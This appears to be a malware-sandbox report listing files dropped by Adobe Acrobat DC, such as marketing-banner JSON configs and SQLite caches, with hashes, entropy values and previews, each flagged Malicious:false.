                                                                                                                          SHA1:A2386E0760710AA70186F47AEBDD3BCDA736F4BA
                                                                                                                          SHA-256:AC7D9A29BB599BAB7C172033B2B89151FA4E61DC16093D1F44DA4C60AB1A48E7
                                                                                                                          SHA-512:FC3E0E62691896C910EEB75C2311ECA4E4C8A10792838D8D8AEF4EB7A0FDF3D45FC3E3C2FE70D069DDC4F791B7D182B301FA853968BD9CB770B542305FAC336A
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"analyticsData":{"responseGUID":"c8d26aad-8aa5-4700-8bdc-581a7c085f64","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733043475640,"statusCode":200,"surfaceID":"DC_FirstMile_Home_View_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):294
                                                                                                                          Entropy (8bit):5.233220992820023
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:YEQXJ2HXKvCBP2Ox+FIbRI6XVW7+0YxpTUxoAvJfBD2G6UpnrPeUkwRe9:YvXKXKvknUYpW74TTGR22cUkee9
                                                                                                                          MD5:752CB08C03D73D924E1B2320F21AD306
                                                                                                                          SHA1:91B26E0D73F40786559EE74352413401B491BD65
                                                                                                                          SHA-256:5E67CDC2ADFECF0AD1E62B4D12FE23DD05EE5879A47DBA48D4EF699F0D2ED0E3
                                                                                                                          SHA-512:A6987B740CFF584D5070A8329789BA63AA776D28A3D1EFDB56025F10C1388B5F739F36CBD56B96126BDFF4EF8A03E474AADFEAAE1822EBB60D37D14C0B6B4B76
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"analyticsData":{"responseGUID":"c8d26aad-8aa5-4700-8bdc-581a7c085f64","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733043475640,"statusCode":200,"surfaceID":"DC_FirstMile_Right_Sec_Surface","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):285
                                                                                                                          Entropy (8bit):5.293038703944135
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:YEQXJ2HXKvCBP2Ox+FIbRI6XVW7+0YxpTUxoAvJfPmwrPeUkwRe9:YvXKXKvknUYpW74TTGH56Ukee9
                                                                                                                          MD5:C46016F992297DB2B489B1ADDED31599
                                                                                                                          SHA1:F5A125D6EE14A25738253BA7FB1AE5AE3D807061
                                                                                                                          SHA-256:23E6B668D101208ABDC8CFD7660DB2C3955144279AEA44B4DE70E336BEFFE872
                                                                                                                          SHA-512:BE0717CB807D7BBCA8333051B0BBB96E95E73207CACD04B966D358A00762DAA7CA64D2B19507C468008A7315F5D06F518778AD3C2D73AF401DAC34F95C885425
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"analyticsData":{"responseGUID":"c8d26aad-8aa5-4700-8bdc-581a7c085f64","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733043475640,"statusCode":200,"surfaceID":"DC_READER_LAUNCH_CARD","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1123
                                                                                                                          Entropy (8bit):5.686168646150281
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:Yv6XKsFieIpLgE9cQx8LennAvzBvkn0RCmK8czOCCSY:YvheIhgy6SAFv5Ah8cv/Y
                                                                                                                          MD5:07636FC73086F8F64B9B9FA93C713836
                                                                                                                          SHA1:5397E81B002A67930F0D4C77796C11E956603C52
                                                                                                                          SHA-256:4AFEE8AF3D199A3017E0C8F209F94BB0EF167E82583050438D28459AC0867DC5
                                                                                                                          SHA-512:F1C980488ACE63EDBD1BE951024BC73D6B004221E7E5026FDF9AD03CE95605E75517C897819F760CAF53464DA450A2C63065D46846FCE775CF463954A0310EF9
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"analyticsData":{"responseGUID":"c8d26aad-8aa5-4700-8bdc-581a7c085f64","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733043475640,"statusCode":200,"surfaceID":"DC_Reader_Convert_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Convert_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_1","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"d5bba1ae-6009-4d23-8886-fd4a474b8ac9","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Convert_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkNvbnZlcnRQREZSZHJSSFBBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkV4cG9ydCBQREZzIHRvIE1pY3Jvc29mdCBXb3JkIGFuZCBFeGNlbC4ifSwidGNh
                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1122
                                                                                                                          Entropy (8bit):5.673543342524563
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:Yv6XKsFieaVLgEwcp06ybnAvz7xHn0RCmK8czOCYHfl8zdBd:YvheaFgSNycJUAh8cvYHW
                                                                                                                          MD5:BBB7471AC706EAF3537C26BC47DD01F7
                                                                                                                          SHA1:8D9472E27BE0A301D192C0484F270C60EE2B3441
                                                                                                                          SHA-256:AB54423B880C5704A663BAD06F487603D678607E611E7166769DB1A9AB75D78B
                                                                                                                          SHA-512:7FC69D02B4B7772D7D2CDA900B79E310096B0D008127129FEB9FF4C71AA13136765E3D21E74A5CFA1130914313E73119E828832F12B24E64755A68852642FD0B
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"analyticsData":{"responseGUID":"c8d26aad-8aa5-4700-8bdc-581a7c085f64","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733043475640,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Disc_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93181_288855ActionBlock_0","campaignId":93181,"containerId":"1","controlGroupId":"","treatmentId":"1aad653c-ef44-43f7-be1c-3a2ba2cf2cfc","variationId":"288855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Disc_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkNvbnZlcnQsIGVkaXQgYW5kIGUtc2lnblxuIFBERiBmb3JtcyAmIGFncmVlbWVudHMuIn0sInRjY
                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):292
                                                                                                                          Entropy (8bit):5.23965613392566
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:YEQXJ2HXKvCBP2Ox+FIbRI6XVW7+0YxpTUxoAvJfQ1rPeUkwRe9:YvXKXKvknUYpW74TTGY16Ukee9
                                                                                                                          MD5:2F3CE7D1CA8EE75A964FF2F6B88A3ECF
                                                                                                                          SHA1:B593921334E4958872A1AF5A087D651B5109A48C
                                                                                                                          SHA-256:09A69AFD205916623BFDF47B11716E6EF78085F09B6EDB9D03CD9E16A672B094
                                                                                                                          SHA-512:7576DD0AD4E18CB338DEE692DB66EDE9529453DC51091526A74DDA74607E8E4FF83D61048A86C0C2B0BF5DE0E23071256FDFDECFC3E3D110AA240D8AA68C95D5
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"analyticsData":{"responseGUID":"c8d26aad-8aa5-4700-8bdc-581a7c085f64","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733043475640,"statusCode":200,"surfaceID":"DC_Reader_Disc_LHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1102
                                                                                                                          Entropy (8bit):5.669549880992751
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:Yv6XKsFieH2LgErcXWl7y0nAvzIBcSJCBViVd:YvheHogH47yfkB5kVY
                                                                                                                          MD5:99B408010A3D48442AE4E36A87A13EC6
                                                                                                                          SHA1:4CF2B5FBD6802A3604F1D31A3490D62638CACCCC
                                                                                                                          SHA-256:599BCF09F0DFF79C0E1DA8C6577C846A19524DDC6759976C971FB95A0A058F67
                                                                                                                          SHA-512:EED0CCEF18189BC7703B8D152C260A4D65F69A0B8F25B46AC4E1F1AEC6D0B70920B004621F63AC00A4800B8041264B1D0A27E332910F6774164FA1760553AFC9
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"analyticsData":{"responseGUID":"c8d26aad-8aa5-4700-8bdc-581a7c085f64","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733043475640,"statusCode":200,"surfaceID":"DC_Reader_Edit_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Edit_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93181_288855ActionBlock_1","campaignId":93181,"containerId":"1","controlGroupId":"","treatmentId":"533ab5eb-b236-4889-89a5-ac002261d71e","variationId":"288855"},"containerId":1,"containerLabel":"JSON for DC_Reader_Edit_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IkVkaXRQREZSZHJBcHBGdWxsIn0sInVpIjp7InRpdGxlX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTRweCIsImZvbnRfc3R5bGUiOiIwIn0sImRlc2NyaXB0aW9uX3N0eWxpbmciOnsiZm9udF9zaXplIjoiMTJweCIsImZvbnRfc3R5bGUiOiItMSJ9LCJ0aXRsZSI6bnVsbCwiZGVzY3JpcHRpb24iOiJFZGl0IHRleHQsIGltYWdlcywgcGFnZXMsIGFuZCBtb3JlLiJ9LCJ0Y2F0SWQiOm51bGx9","da
                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1164
                                                                                                                          Entropy (8bit):5.692781629400753
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:Yv6XKsFierKLgEfIcZVSkpsn264rS514ZjBrwloJTmcVIsrSK5d:YvherEgqprtrS5OZjSlwTmAfSKj
                                                                                                                          MD5:63301CC68785ED6022056F403E7DE4AB
                                                                                                                          SHA1:61E0B4B0EF0822705931430A15E57EDDA688772E
                                                                                                                          SHA-256:4453D4192F02288ADA549D31453BC041766F0D02D488B0800295376D65411C83
                                                                                                                          SHA-512:2B070A6E8BD7B5BE33D9D236B9390EAE60FD32927140704CAC205031EE4E4F1D9B95937545B0DDB96FF13098C7CDF7DB525943259019A173A016A2AD7C90A595
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"analyticsData":{"responseGUID":"c8d26aad-8aa5-4700-8bdc-581a7c085f64","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733043475640,"statusCode":200,"surfaceID":"DC_Reader_Home_LHP_Trial_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Home_LHP_Trial_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"85531_264848ActionBlock_0","campaignId":85531,"containerId":"1","controlGroupId":"","treatmentId":"ee1a7497-76e7-43c2-bb63-9a0551e11d73","variationId":"264848"},"containerId":1,"containerLabel":"JSON for DC_Reader_Home_LHP_Trial_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IlRyeSBBY3JvYmF0IFBybyJ9LCJ1aSI6eyJ0aXRsZV9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjE1cHgiLCJmb250X3N0eWxlIjoiMCJ9LCJkZXNjcmlwdGlvbl9zdHlsaW5nIjp7ImZvbnRfc2l6ZSI6IjEzcHgiLCJmb250X3N0eWxlIjoiLTEifSwidGl0bGUiOiJGcmVlIHRyaWFsIiwiZGVzY3JpcHRpb24iOiJHZXQgdW5saW1pdGVkIGFjY2VzcyB0b1xucHJlbWl1bSBQREYgYW5kIGUtc2lnbmluZ1xudG9vbHMuIn0sImJhbm5lcl9zdHlsaW5nIjo
                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):289
                                                                                                                          Entropy (8bit):5.245638688808968
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:YEQXJ2HXKvCBP2Ox+FIbRI6XVW7+0YxpTUxoAvJfYdPeUkwRe9:YvXKXKvknUYpW74TTGg8Ukee9
                                                                                                                          MD5:9EBA6A2532E6F42044351BFFBBB96475
                                                                                                                          SHA1:99521367B1D6851E9997BAB326A2033DB9FEF629
                                                                                                                          SHA-256:820D22C0BE795F405279C183D14B910C010D4A2972772A57E6D0F8CA8184DECC
                                                                                                                          SHA-512:C94586D2D3C8A632BF6056644E91894A0E442E7D56DF60A80D3C7785D65C77C17DCE14A876916DA6742B4A3FA8138D44048014BD015F1EBD716A7C9E1B54FAEE
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"analyticsData":{"responseGUID":"c8d26aad-8aa5-4700-8bdc-581a7c085f64","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733043475640,"statusCode":200,"surfaceID":"DC_Reader_More_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):284
                                                                                                                          Entropy (8bit):5.23041429476093
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:YEQXJ2HXKvCBP2Ox+FIbRI6XVW7+0YxpTUxoAvJf+dPeUkwRe9:YvXKXKvknUYpW74TTG28Ukee9
                                                                                                                          MD5:33D0A75CA664C2C33BE81FE63F5E3DD3
                                                                                                                          SHA1:3768C376564A7F79A219C72674FE26B778E7EEC4
                                                                                                                          SHA-256:0C7625A5E2E603093DBF8852188BEF8D3E04755020D421D6269063AEE45857E0
                                                                                                                          SHA-512:2E642D7A4E4413C555CA3AEE8B67BDBE052CC9B2656EBEC2C76635A4919DFB1B20909D5368C3C7D7D79C54ED0DB9471468BE7E296EA4E837F559C9B9AAA2BF9C
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"analyticsData":{"responseGUID":"c8d26aad-8aa5-4700-8bdc-581a7c085f64","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733043475640,"statusCode":200,"surfaceID":"DC_Reader_RHP_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):291
                                                                                                                          Entropy (8bit):5.229559403741876
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:YEQXJ2HXKvCBP2Ox+FIbRI6XVW7+0YxpTUxoAvJfbPtdPeUkwRe9:YvXKXKvknUYpW74TTGDV8Ukee9
                                                                                                                          MD5:ACD4FCE4AC3FEF4489EF9924E4B32AEE
                                                                                                                          SHA1:488FFD925ADAFC621BF007EA688072601A14FE7C
                                                                                                                          SHA-256:1339DE2632EB81C61457FC78A175A036445BC8989E78E7CE163217F518A0785E
                                                                                                                          SHA-512:0E1E5CF7FD2E6DDBED41EA847CF274859FEBC60BC2E0C66DBD6B6F7777497FAAE3FEB2EB82729E4D7C43EE41F28A0002CF277734B61E16293F7DE59B80F85C55
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"analyticsData":{"responseGUID":"c8d26aad-8aa5-4700-8bdc-581a7c085f64","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733043475640,"statusCode":200,"surfaceID":"DC_Reader_RHP_Intent_Banner","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):287
                                                                                                                          Entropy (8bit):5.231320149385286
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:YEQXJ2HXKvCBP2Ox+FIbRI6XVW7+0YxpTUxoAvJf21rPeUkwRe9:YvXKXKvknUYpW74TTG+16Ukee9
                                                                                                                          MD5:00B2F1223C4FBA1670CEBEE40ABE0978
                                                                                                                          SHA1:02B7D4BE7A8F8EB7FE47270A7BE78C749E1E800D
                                                                                                                          SHA-256:6AC67745A24F96B23A4D0D6A5D6718A801481394EBD7E062060FA06BC82576D2
                                                                                                                          SHA-512:0CCA560E2ACF9DE7D44E67704A42ED2E51DCE1D963387C7C3031E6CF0082F1AC08B49255E20133958A4B6738EA879AB9B543EEDBDA3F3B3EFAAFA80CE452FE47
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"analyticsData":{"responseGUID":"c8d26aad-8aa5-4700-8bdc-581a7c085f64","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733043475640,"statusCode":200,"surfaceID":"DC_Reader_RHP_Retention","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):1090
                                                                                                                          Entropy (8bit):5.658117092936389
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:Yv6XKsFie8amXayLgE+cNDxeNaqnAvz7xHn0RCmK8czOC/BSY:YvheaBgkDMUJUAh8cvMY
                                                                                                                          MD5:E7B86EA426D862CC3BBE52B53CF00B5B
                                                                                                                          SHA1:F9584390D3E608A02EB556D55F6B8FA6CEFA3118
                                                                                                                          SHA-256:BA67CC0723033671BB6F4ED4EC2B3DFDA94FE0104C2584395DE2497E2DB8D638
                                                                                                                          SHA-512:5E5CB117F894F1A8752F8C0776BD2A903BCE894FD6DEBA618FD29888B0085BA3B4929BC318556269B41F3658764E2826DB5A7976E4EDE03C1631BFD39F57AA64
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"analyticsData":{"responseGUID":"c8d26aad-8aa5-4700-8bdc-581a7c085f64","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733043475640,"statusCode":200,"surfaceID":"DC_Reader_Sign_LHP_Banner","surfaceObj":{"SurfaceAnalytics":{"surfaceId":"DC_Reader_Sign_LHP_Banner"},"containerMap":{"1":{"containerAnalyticsData":{"actionBlockId":"93365_289436ActionBlock_0","campaignId":93365,"containerId":"1","controlGroupId":"","treatmentId":"266234d2-130d-426e-8466-c7a061db101f","variationId":"289436"},"containerId":1,"containerLabel":"JSON for DC_Reader_Sign_LHP_Banner","content":{"data":"eyJjdGEiOnsidGV4dCI6IkZyZWUgdHJpYWwiLCJjbGljayI6Im9wZW5Ub29sIiwidG9vbF9pZCI6IlVwZ3JhZGVSSFBSZHJBcHAifSwidWkiOnsidGl0bGVfc3R5bGluZyI6eyJmb250X3NpemUiOiIxNHB4IiwiZm9udF9zdHlsZSI6IjAifSwiZGVzY3JpcHRpb25fc3R5bGluZyI6eyJmb250X3NpemUiOiIxMnB4IiwiZm9udF9zdHlsZSI6Ii0xIn0sInRpdGxlIjpudWxsLCJkZXNjcmlwdGlvbiI6IkVhc2lseSBmaWxsIGFuZCBzaWduIFBERnMuIn0sInRjYXRJZCI6bnVsbH0=","dataType":"app
                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):286
                                                                                                                          Entropy (8bit):5.2034469538397214
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:YEQXJ2HXKvCBP2Ox+FIbRI6XVW7+0YxpTUxoAvJfshHHrPeUkwRe9:YvXKXKvknUYpW74TTGUUUkee9
                                                                                                                          MD5:12900DDED0680EC9211FFB93284BF2A6
                                                                                                                          SHA1:1A180E32CF9DF65AC3C631EDD48271F4346E3154
                                                                                                                          SHA-256:9B512F84C272DC402FB9E8C2BDCE932EF0F282859D7A43525AD1E4394B4C12C6
                                                                                                                          SHA-512:88B4BD1A80C8017B2C35C9B714D8FF000A73901090739185B4111DFF24F57F07EDC274CF040D9BF266D07EC3D84E5E54AEB695B7039794E15AF0C86D3A21B210
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"analyticsData":{"responseGUID":"c8d26aad-8aa5-4700-8bdc-581a7c085f64","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733043475640,"statusCode":200,"surfaceID":"DC_Reader_Upsell_Cards","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):282
                                                                                                                          Entropy (8bit):5.216082726149762
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:6:YEQXJ2HXKvCBP2Ox+FIbRI6XVW7+0YxpTUxoAvJTqgFCrPeUkwRe9:YvXKXKvknUYpW74TTGTq16Ukee9
                                                                                                                          MD5:BEB72CE839FADE80E97D9C80777A62B5
                                                                                                                          SHA1:EE327BDF93EC6D3EFE08694D011E1E48FCF239A5
                                                                                                                          SHA-256:3D518054924F7343F3F71F85289B9435460A76889E169D1A4575E36CF3F60476
                                                                                                                          SHA-512:C45FEB9493CB128887A6FB32FC99A5056CD70910D27C4475F5A8522C294F0CF5A79E483E0728C1C1E6B9D8976FBC706CEF7F94C9F7DC06F2D96579D1DF65470D
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"analyticsData":{"responseGUID":"c8d26aad-8aa5-4700-8bdc-581a7c085f64","sophiaUUID":"FC1B1BAD-CA24-4641-AA35-0D02D0C204D1"},"encodingScheme":true,"expirationDTS":1733043475640,"statusCode":200,"surfaceID":"Edit_InApp_Aug2020","surfaceObj":{"SurfaceAnalytics":{},"containerMap":{}}}
                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                          File Type:data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):4
                                                                                                                          Entropy (8bit):0.8112781244591328
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:3:e:e
                                                                                                                          MD5:DC84B0D741E5BEAE8070013ADDCC8C28
                                                                                                                          SHA1:802F4A6A20CBF157AAF6C4E07E4301578D5936A2
                                                                                                                          SHA-256:81FF65EFC4487853BDB4625559E69AB44F19E0F5EFBD6D5B2AF5E3AB267C8E06
                                                                                                                          SHA-512:65D5F2A173A43ED2089E3934EB48EA02DD9CCE160D539A47D33A616F29554DBD7AF5D62672DA1637E0466333A78AAA023CBD95846A50AC994947DC888AB6AB71
                                                                                                                          Malicious:false
                                                                                                                          Preview:....
                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                          File Type:JSON data
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):2817
                                                                                                                          Entropy (8bit):5.138491202285683
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:YLveKaE8wLayPdRn3/DLx3GClqTR5mIrjdvj0SxfZh2rE2LSTCs/BcatwJ9S5w9R:Yb3dRnh33QdYEx9F5ppcatwJYG92ut
                                                                                                                          MD5:EB60EE89FE4F0ECF7779B02985CFE7F4
                                                                                                                          SHA1:B1B4AF29B97F5FA1123F44DC7C0DEEAEF4ADF7EE
                                                                                                                          SHA-256:62F217E6AEA1AC595DDCBD22E563C02B9CE25732F96FD4FFEF7D1121223F9C94
                                                                                                                          SHA-512:8218ACB917C2EB006D05ED0D1744F5F18E49F59FD742F8A3BCCC8C4075C5FDBFF9049626A5CD48F7A804114448F2B496283EF4BFD2B87915111410CD45E77BD8
                                                                                                                          Malicious:false
                                                                                                                          Preview:{"all":[{"id":"DC_Reader_Disc_LHP_Banner","info":{"dg":"a1a73247b303b9f094b2499690f594a1","sid":"DC_Reader_Disc_LHP_Banner"},"mimeType":"file","size":1122,"ts":1732865455000},{"id":"DC_Reader_Home_LHP_Trial_Banner","info":{"dg":"75b9df9a32b596947e26e073ac3a7941","sid":"DC_Reader_Home_LHP_Trial_Banner"},"mimeType":"file","size":1164,"ts":1732865455000},{"id":"DC_Reader_Sign_LHP_Banner","info":{"dg":"b587a0fe7dda8bc5775fc917f411ef30","sid":"DC_Reader_Sign_LHP_Banner"},"mimeType":"file","size":1090,"ts":1732865455000},{"id":"DC_Reader_Convert_LHP_Banner","info":{"dg":"d982ed8161e76e66d56a291ea9a88f43","sid":"DC_Reader_Convert_LHP_Banner"},"mimeType":"file","size":1123,"ts":1732865455000},{"id":"DC_Reader_Edit_LHP_Banner","info":{"dg":"f0582a5d0360bc4e9ee626293a2cccd6","sid":"DC_Reader_Edit_LHP_Banner"},"mimeType":"file","size":1102,"ts":1732865455000},{"id":"DC_Reader_Disc_LHP_Retention","info":{"dg":"931ff23a6eeadaee37552d7d1e9124f0","sid":"DC_Reader_Disc_LHP_Retention"},"mimeType":"file
                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                          File Type:SQLite 3.x database, last written using SQLite version 3040000, file counter 19, database pages 3, cookie 0x2, schema 4, UTF-8, version-valid-for 19
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):12288
                                                                                                                          Entropy (8bit):0.9836444007624325
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:TLHRx/XYKQvGJF7urs6I1RZKHs/Ds/SptgV4zJwtNBwtNbRZ6bRZ4OgVF:TVl2GL7ms6ggOVptvzutYtp6PLI
                                                                                                                          MD5:767DD7AC6D1AAD95CAC2E555E2443C8D
                                                                                                                          SHA1:8745DB4E3352AD7A283F999C551E1E01A3A0A678
                                                                                                                          SHA-256:F16D1CE0F5665B9DB5F1F5E36C9B3D4D212EE341DB32F931D6C4F02E2F5241E1
                                                                                                                          SHA-512:E203BA7693F9078085F6BB3D349993000F57EC474FBB60D3E4E4C12A9DCD1FAECD0890CD9BEB1EC05F517B7AE3578BD59D06989A103C8EF17DD42E461E1A518F
                                                                                                                          Malicious:false
                                                                                                                          Preview:SQLite format 3......@ ..........................................................................c.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                          Process:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                                                                          File Type:SQLite Rollback Journal
                                                                                                                          Category:dropped
                                                                                                                          Size (bytes):8720
                                                                                                                          Entropy (8bit):1.3376520866971984
                                                                                                                          Encrypted:false
                                                                                                                          SSDEEP:24:7+tepAD1RZKHs/Ds/SptgVPzJwtNBwtNbRZ6bRZWf1RZK+3qLBx/XYKQvGJF7ur1:7MepGgOVptYzutYtp6PMNqll2GL7msI
                                                                                                                          MD5:197E9A16919BDB7BA2B55EA8C74702B6
                                                                                                                          SHA1:3A050DDBCD3188805F3A42F65198CAECC513856C
                                                                                                                          SHA-256:74B294084FBCCEDEA3D374F4424908413623748E43D30A91A403839EB8E9B6C7
